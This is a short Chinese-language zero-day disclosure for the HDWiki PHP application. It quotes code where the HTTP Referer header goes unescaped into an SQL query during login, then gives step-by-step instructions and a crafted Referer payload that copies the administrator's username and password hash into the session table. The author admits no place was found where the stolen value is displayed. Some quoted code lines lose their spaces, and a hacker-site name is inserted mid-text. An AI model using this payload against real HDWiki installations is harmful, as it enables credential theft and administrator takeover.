HDWIKI鸡肋0day
model/user.class.php:
function add_referer(){
if($_SERVER['HTTP_REFERER']){
$this->db->query("UPDATE".DB_TABLEPRE."session SET referer='".$_SERVER['HTTP_REFERER']."' WHERE sid='".base::hgetcookie('sid')."'");
}//问题再此
}
functionget_referer(){
$session=$this->db->fetch_first("SELECTreferer FROM ".DB_TABLEPRE."session WHERE sid='".base::hgetcookie('sid')."'");
if($session['referer']==""){
$session['referer']="index.php";
}else{
if(strpos($session['referer'],'admin_')!==false){
$session['referer']="index.php?admin_main";
}
}
return$session['referer'];
}
回溯到www.hack1990.com control/user.php
function dologin(){
$_ENV['user']->passport_server('login','1');
if(!isset($this->post['submit'])){ //submit为null进入
$this->view->assign('checkcode',isset($this->setting['checkcode'])?$this->setting['checkcode']:0);
$_ENV['user']->add_referer();//登录时注入形成
$_ENV['user']->passport_server('login','2');
$_ENV['user']->passport_client('login');
if(!isset($this->setting['name_min_length'])){$this->setting['name_min_length'] = 3;}
if(!isset($this->setting['name_max_length'])){$this->setting['name_max_length'] = 15;}
$loginTip2= str_replace(array('3','15'),array($this->setting['name_min_length'],$this->setting['name_max_length']),$this->view->lang['loginTip2']);
$this->view->assign('name_min_length',$this->setting['name_min_length']);
$this->view->assign('name_max_length',$this->setting['name_max_length']);
$this->view->assign('loginTip2',$loginTip2);
//$this->view->display('login');
$_ENV['block']->view('login');
}else{
……以下代码省略
1、抓登陆包
2、随便建个用户登陆
3、修改包,post内容只保留username和password就好,其他的删掉。
如username=test&password=test
4、使用burpsuite或者nc,修改包头referer,如改为:
admin_',username=(SELECT concat(username,0x2f,password) FROM wiki_user where uid=1)#
提交后即将管理员账号、密码赋值于wiki_session表的username字段。
因此调用wiki_session.username变量的页面会爆出账号密码(管理员和普通用户同在wiki_user表中)。
注:但是没有找到username或者hdwiki_session表字段回显的地方,鸡肋在此